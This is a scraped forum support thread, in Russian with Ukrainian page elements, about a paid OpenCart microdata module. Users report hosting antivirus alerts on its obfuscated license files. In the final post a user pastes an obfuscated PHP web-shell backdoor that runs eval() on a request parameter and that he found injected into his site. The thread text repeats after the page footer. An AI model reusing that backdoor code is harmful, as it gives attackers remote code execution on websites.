edidik Опубліковано: 3 жовтня 2015 Share Опубліковано: 3 жовтня 2015 Здравствуйте. Микроразметка для статей в версиях 1.5.x.x есть? Надіслати Поділитися на інших сайтах More sharing options...
DariyGRAY Опубліковано: 7 жовтня 2015 Автор Share Опубліковано: 7 жовтня 2015 Здравствуйте. Микроразметка для статей в версиях 1.5.x.x есть? Здравствуйте. Нет, для статей - нет. Надіслати Поділитися на інших сайтах More sharing options... meduzov Опубліковано: 12 жовтня 2015 Share Опубліковано: 12 жовтня 2015 Здравствуйте, купил модуль, не могу отправить письмо с просьбой об активации, письмо возвращается. В ЛС тоже не могу написать. Прошу помочь. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 12 жовтня 2015 Автор Share Опубліковано: 12 жовтня 2015 Здравствуйте, купил модуль, не могу отправить письмо с просьбой об активации, письмо возвращается. В ЛС тоже не могу написать. Прошу помочь. Странно что в ЛС не можете написать. Я вам в скайпе ответил. Надіслати Поділитися на інших сайтах More sharing options... meduzov Опубліковано: 13 жовтня 2015 Share Опубліковано: 13 жовтня 2015 Странно что в ЛС не можете написать. Я вам в скайпе ответил. Спасибо, ключ получил, но нужна ваша помощь, так как не все работает. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 14 жовтня 2015 Автор Share Опубліковано: 14 жовтня 2015 Спасибо, ключ получил, но нужна ваша помощь, так как не все работает. Ящик почистил немного, так что можете писать в личку (ну или в Skype) Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... Onlineserfing Опубліковано: 4 листопада 2015 Share Опубліковано: 4 листопада 2015 запрос на активацию не прошел. письмо вернулось. в ЛС сейчас скину Надіслати Поділитися на інших сайтах More sharing options... Onlineserfing Опубліковано: 5 листопада 2015 Share Опубліковано: 5 листопада 2015 В архиве вирус?? Здравствуйте!Вас приветствует Регистратор доменных имён REG.RU!Вы являетесь владельцем услуги хостинга u00ХХХХХХ .Уведомляем вас о том, что на вашем аккаунте обнаружено вредоносное программное обеспечение.Наши рекомендации по решению проблемы:https://www.reg.ru/support/hosting-i-servery/hosting-sajtov/bezopasnost-hostinga/chto-delat-esli-sayt-zarazhenРезультат проверки антивируса Virusdie:{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/system/library/microdata/license-not.php{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/admin/controller/module/microdata.php--С уважением,Регистратор доменных имён REG.RU Надіслати Поділитися на інших сайтах More sharing options... 19th Опубліковано: 5 листопада 2015 Share Опубліковано: 5 листопада 2015 В архиве вирус??не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 9 листопада 2015 Автор Share Опубліковано: 9 листопада 2015 не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля. Совершенно верно. Бывает, что антивирусы хостеров ругаются. Но могу дать гарантию 100% того, что если качали отсюда с форума или по моим прямым ссылкам, то вируса нет (только обфусцированный код - шифрование) Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... emilbazilio Опубліковано: 20 листопада 2015 Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Вечер добрый. Даже и не знаю с чего начать. Может переписку в личке опубликовать? Вы писали о том, что модуль выдает ошибки. Судя по ошибкам, не глядя даже на сайт, я предположил, что вы используете старую версию модуля. Предложил обновить. Вы самостоятельно обновили и ошибки с ваших же слов пропали. Дальше продолжать в чем заключалось ваше обращаение ко мне? Вы задали конкретный вопрос, на который я конкретно ответил. Но сам же предложил ради вашего же спокойствия проверить как вы сами модифицировали файлы модуля. Проверить я не смог сразу, так как отсутствовал более недели. В соседней тебе я одному человеку об этом уже писал. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 (змінено) Модуль микроразметки перекашивает работу модуля Пав Блога Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Змінено 20 листопада 2015 користувачем DariyGRAY Надіслати Поділитися на інших сайтах More sharing options... emilbazilio Опубліковано: 22 листопада 2015 Share Опубліковано: 22 листопада 2015 Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Ошибки о которых Вам писал в ЛС решились с помощью обновления модуля. Ошибка связанная с Блогом была как на старой версии модуля так и на новой если не модифицировать с дефолного на мой шаблон. Хотел чтобы Вы помогли разобраться с этим, вот и всё! По поводу того, что Вас не будет неделю я не знал, по этому не понял почему не взялись помочь. Рад что не отказываетесь помочь! Надіслати Поділитися на інших сайтах More sharing options... 2 months later... kamar87 Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Вот спасибо добрый человек, удачи вам! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Да, обновился - модуль теперь раздается бесплатно (это самое главное обновление) Надіслати Поділитися на інших сайтах More sharing options... Shenya155 Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ:) Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :) Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Могу. Имя домена в личку или Skype напишите. Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options... Назад 8 9 10 11 12 13 14 15 16 Вперед Сторінка 13 з 16 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Схожі публікації batch Універсальний масовий редактор товарів. MultiEdit AI Автор: Sha, 15 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 0 коментарів 57 499 переглядів Sha 15 березня 2017 batch [Поддержка] Універсальний масовий редактор товарів. MultiEdit AI 1 2 3 4 11 Автор: Sha, 16 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 253 відповіді 58 260 переглядів Sha 17 листопада [Поддержка] 1 2 3 4 11 Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 269 відповідей 27 919 переглядів Frolly 11 листопада Accordion & Tabs - конструктор контенту - акордеон, вкладки, банер, слайдер, галерея, сітка, меню, popup, віджети та ін. Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 0 коментарів 36 152 перегляди Seriusis 21 квітня 2020 Rich Snippet - SEO Structured Data (Добавление разметки сайта)[Поддержка] Автор: kirians, 27 жовтня 2021 snippets rich snippets (і ще %d) Теги: snippets rich snippets structured data seo сниппет сниппеты сниппет google сніппет сніппети сео 3 відповіді 948 переглядів kirians 25 лютого 2022 Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Модулі та розширення SEO, карта сайта, оптимизация [Поддержка] Микроразметка + ОСТРОВА в YANDEX Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
meduzov Опубліковано: 12 жовтня 2015 Share Опубліковано: 12 жовтня 2015 Здравствуйте, купил модуль, не могу отправить письмо с просьбой об активации, письмо возвращается. В ЛС тоже не могу написать. Прошу помочь. Надіслати Поділитися на інших сайтах More sharing options...
DariyGRAY Опубліковано: 12 жовтня 2015 Автор Share Опубліковано: 12 жовтня 2015 Здравствуйте, купил модуль, не могу отправить письмо с просьбой об активации, письмо возвращается. В ЛС тоже не могу написать. Прошу помочь. Странно что в ЛС не можете написать. Я вам в скайпе ответил. Надіслати Поділитися на інших сайтах More sharing options... meduzov Опубліковано: 13 жовтня 2015 Share Опубліковано: 13 жовтня 2015 Странно что в ЛС не можете написать. Я вам в скайпе ответил. Спасибо, ключ получил, но нужна ваша помощь, так как не все работает. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 14 жовтня 2015 Автор Share Опубліковано: 14 жовтня 2015 Спасибо, ключ получил, но нужна ваша помощь, так как не все работает. Ящик почистил немного, так что можете писать в личку (ну или в Skype) Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... Onlineserfing Опубліковано: 4 листопада 2015 Share Опубліковано: 4 листопада 2015 запрос на активацию не прошел. письмо вернулось. в ЛС сейчас скину Надіслати Поділитися на інших сайтах More sharing options... Onlineserfing Опубліковано: 5 листопада 2015 Share Опубліковано: 5 листопада 2015 В архиве вирус?? Здравствуйте!Вас приветствует Регистратор доменных имён REG.RU!Вы являетесь владельцем услуги хостинга u00ХХХХХХ .Уведомляем вас о том, что на вашем аккаунте обнаружено вредоносное программное обеспечение.Наши рекомендации по решению проблемы:https://www.reg.ru/support/hosting-i-servery/hosting-sajtov/bezopasnost-hostinga/chto-delat-esli-sayt-zarazhenРезультат проверки антивируса Virusdie:{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/system/library/microdata/license-not.php{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/admin/controller/module/microdata.php--С уважением,Регистратор доменных имён REG.RU Надіслати Поділитися на інших сайтах More sharing options... 19th Опубліковано: 5 листопада 2015 Share Опубліковано: 5 листопада 2015 В архиве вирус??не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 9 листопада 2015 Автор Share Опубліковано: 9 листопада 2015 не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля. Совершенно верно. Бывает, что антивирусы хостеров ругаются. Но могу дать гарантию 100% того, что если качали отсюда с форума или по моим прямым ссылкам, то вируса нет (только обфусцированный код - шифрование) Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... emilbazilio Опубліковано: 20 листопада 2015 Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Вечер добрый. Даже и не знаю с чего начать. Может переписку в личке опубликовать? Вы писали о том, что модуль выдает ошибки. Судя по ошибкам, не глядя даже на сайт, я предположил, что вы используете старую версию модуля. Предложил обновить. Вы самостоятельно обновили и ошибки с ваших же слов пропали. Дальше продолжать в чем заключалось ваше обращаение ко мне? Вы задали конкретный вопрос, на который я конкретно ответил. Но сам же предложил ради вашего же спокойствия проверить как вы сами модифицировали файлы модуля. Проверить я не смог сразу, так как отсутствовал более недели. В соседней тебе я одному человеку об этом уже писал. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 (змінено) Модуль микроразметки перекашивает работу модуля Пав Блога Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Змінено 20 листопада 2015 користувачем DariyGRAY Надіслати Поділитися на інших сайтах More sharing options... emilbazilio Опубліковано: 22 листопада 2015 Share Опубліковано: 22 листопада 2015 Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Ошибки о которых Вам писал в ЛС решились с помощью обновления модуля. Ошибка связанная с Блогом была как на старой версии модуля так и на новой если не модифицировать с дефолного на мой шаблон. Хотел чтобы Вы помогли разобраться с этим, вот и всё! По поводу того, что Вас не будет неделю я не знал, по этому не понял почему не взялись помочь. Рад что не отказываетесь помочь! Надіслати Поділитися на інших сайтах More sharing options... 2 months later... kamar87 Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Вот спасибо добрый человек, удачи вам! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Да, обновился - модуль теперь раздается бесплатно (это самое главное обновление) Надіслати Поділитися на інших сайтах More sharing options... Shenya155 Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ:) Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :) Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Могу. Имя домена в личку или Skype напишите. Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options... Назад 8 9 10 11 12 13 14 15 16 Вперед Сторінка 13 з 16 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Схожі публікації batch Універсальний масовий редактор товарів. MultiEdit AI Автор: Sha, 15 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 0 коментарів 57 499 переглядів Sha 15 березня 2017 batch [Поддержка] Універсальний масовий редактор товарів. MultiEdit AI 1 2 3 4 11 Автор: Sha, 16 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit 